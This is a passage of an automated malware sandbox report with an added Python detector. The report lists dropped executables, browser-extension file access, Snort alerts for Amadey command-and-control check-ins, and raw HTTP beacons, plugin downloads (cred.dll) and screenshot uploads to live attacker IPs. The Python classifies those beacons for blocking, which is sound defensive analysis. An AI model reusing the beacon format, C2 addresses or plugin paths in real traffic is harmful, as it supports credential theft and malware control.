Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
Source: Binary string: -C:\jixixahut\vovima50\zuwa\ficux93 lodedam pazuwisivovu\sewidel.pdbh source: A7F0.exe, 0000001F.00000002.646423634.0000000002E20000.00000040.00000001.sdmp, A7F0.exe, 0000001F.00000003.532814882.0000000003020000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb- source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb| source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbh source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.469360624.00000000032B0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467390023.00000000032B0000.00000004.00000001.sdmp
                          Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: cfgmgr32.pdbd source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdbr source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: profapi.pdbn source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: 8C:\cuguzab xobu\17_dacop.pdbh source: zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: JC:\konukuwe_nuyujobapuyozi\la.pdbh source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: :]WC:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\yakon-nabavazolof\masa.pdb source: A7F0.exe, 0000001F.00000003.536533685.0000000003240000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.653154423.0000000003190000.00000040.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.473839952.0000000005420000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.473862153.0000000005427000.00000004.00000040.sdmp
                          Source: Binary string: C:\cuguzab xobu\17_dacop.pdb source: zmbGUZTICp.exe, zmbGUZTICp.exe, 00000000.00000002.350665384.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000000.00000000.345397545.0000000000401000.00000020.00020000.sdmp, zmbGUZTICp.exe, 00000001.00000000.348322388.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000000.436425867.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000005.00000002.443661421.0000000000401000.00000020.00020000.sdmp, gdrgbdj, 00000006.00000000.440852957.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.467405426.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467933513.00000000032B6000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.467565394.00000000032B6000.00000004.00000001.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.473821412.0000000005321000.00000004.00000001.sdmp
                          Source: Binary string: C:\konukuwe_nuyujobapuyozi\la.pdb source: 309C.exe, 0000000B.00000000.462090834.0000000000401000.00000020.00020000.sdmp, tejjnepq.exe, 00000018.00000000.482700866.0000000000401000.00000020.00020000.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 1E7F.exe, 00000007.00000000.445613231.0000000000413000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.459447381.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000000C.00000002.500289269.0000000005440000.00000002.00020000.sdmp
                          Source: Binary string: C:\zazadix dori\kol.pdbh source: 2DB3.exe, 00000008.00000000.453772125.0000000000401000.00000020.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\A7F0.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\zmbGUZTICp.exe | Code function: 0_2_004197F1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\2DB3.exe | Code function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.6:49759 -> 141.8.194.74:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49766 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49767 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49771 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49773 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49774 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49777 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49779 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49780 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49784 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49785 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49787 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.6:49787 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49790 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49791 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49792 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49793 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49795 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49796 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49798 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49801 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49802 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49803 -> 185.215.113.35:80
Source: Traffic | Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49804 -> 185.215.113.35:80
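The 2027700 alerts above fire on the check-in POSTs that this report lists further down under HTTP traffic: POST /d2VxjasuwS/index.php with an 85-byte form body, followed by a GET for /d2VxjasuwS/plugins/cred.dll and a multipart POST to index.php?scr=1. The following is an added example and not part of the Joe Sandbox report. It rebuilds those requests from the report's own entries (the check-in body is the report's Data Raw bytes), decodes the form body and classifies each request by the ordered key set, query string and content type seen on the page. The classification names and the `classify`/`triage` helpers are this example's own; field meanings beyond the obvious ones (vs, un, dm) are not stated on the page and are not assumed here. Note that the raw bytes decode to un=engineer where the report's ASCII rendering shows un=user.

```python
"""Decode and classify the Amadey-style C2 requests captured in the report."""
from urllib.parse import parse_qsl, urlsplit

# Check-in body copied from the report's "Data Raw" bytes (85 bytes, matching Content-Length: 85).
CHECKIN_BODY_HEX = (
    "69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 "
    "35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d "
    "65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30"
)

# Constructed sample input: (request line, headers, body) rebuilt from the report's
# "HTTP traffic detected" lines. The multipart body is not reproduced in the report,
# so the screenshot upload is classified from its headers alone.
SAMPLE_REQUESTS = [
    ("POST /d2VxjasuwS/index.php HTTP/1.1",
     {"Content-Type": "application/x-www-form-urlencoded", "Host": "185.215.113.35",
      "Content-Length": "85", "Cache-Control": "no-cache"},
     bytes.fromhex(CHECKIN_BODY_HEX)),
    ("GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1", {"Host": "185.215.113.35"}, b""),
    ("POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1",
     {"Content-Type": "multipart/form-data; boundary=----83d53270d11404365da7fce61041da17",
      "Host": "185.215.113.35", "Content-Length": "83837", "Cache-Control": "no-cache"},
     b""),
    ("GET /capibar HTTP/1.1",
     {"Host": "185.163.204.22", "Content-Type": "text/plain; charset=UTF-8"}, b""),
]

# Ordered key set of the check-in form body exactly as it appears on the page.
AMADEY_CHECKIN_KEYS = ("id", "vs", "sd", "os", "bi", "ar", "pc", "un", "dm", "av", "lv")


def classify(request_line, headers, body):
    """Return a finding dict for an Amadey-style request, or None for anything else."""
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    ctype = headers.get("Content-Type", "").lower()
    host = headers.get("Host", "")
    base = url.path.rsplit("/", 1)[0]            # C2 directory, e.g. /d2VxjasuwS
    if method == "POST" and url.path.endswith("/index.php"):
        if not url.query and ctype.startswith("application/x-www-form-urlencoded"):
            pairs = parse_qsl(body.decode("ascii", "replace"), keep_blank_values=True)
            if tuple(k for k, _ in pairs) == AMADEY_CHECKIN_KEYS:
                declared = headers.get("Content-Length")
                return {"kind": "amadey-checkin", "host": host, "base": base,
                        "fields": dict(pairs),
                        # a beacon whose declared length disagrees with the body is worth a look
                        "content_length_ok": declared is not None and int(declared) == len(body)}
        if url.query == "scr=1" and ctype.startswith("multipart/form-data"):
            return {"kind": "amadey-screenshot-upload", "host": host, "base": base}
    if method == "GET" and "/plugins/" in url.path and url.path.endswith(".dll"):
        return {"kind": "amadey-plugin-download", "host": host,
                "base": url.path.split("/plugins/", 1)[0],
                "plugin": url.path.rsplit("/", 1)[1]}
    return None


def triage(requests):
    """Classify every captured request and keep only the Amadey-related findings."""
    return [f for f in (classify(*r) for r in requests) if f is not None]


def c2_endpoints(findings):
    """Distinct (host, base path) pairs, so the repeated beacons collapse to one C2 entry."""
    return sorted({(f["host"], f["base"]) for f in findings})


if __name__ == "__main__":
    found = triage(SAMPLE_REQUESTS)
    for f in found:
        print(f)
    print("C2 endpoints:", c2_endpoints(found))
```

The key-order match is deliberately strict: it is what distinguishes this beacon from any other form POST to an index.php, and the twenty-odd identical POSTs in the report all reduce to a single (host, base path) pair, which is the indicator worth blocking. The /capibar request to 185.163.204.22 is intentionally left unclassified; the page gives no body for it, so nothing on the page supports labelling it.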
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 94.142.143.116 443
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe | Domain query: unicupload.top
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe | Domain query: goo.su
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1 | Host: 185.215.113.35
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php?scr=1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=----83d53270d11404365da7fce61041da17 | Host: 185.215.113.35 | Content-Length: 83837 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 132 | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET //l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
Source: global traffic | HTTP traffic detected: POST /d2VxjasuwS/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.35 | Content-Length: 85 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 30 31 26 73 64 3d 62 64 36 66 35 31 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 39 39 32 35 34 37 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.01&sd=bd6f51&os=1&bi=1&ar=1&pc=992547&un=user&dm=&av=13&lv=0
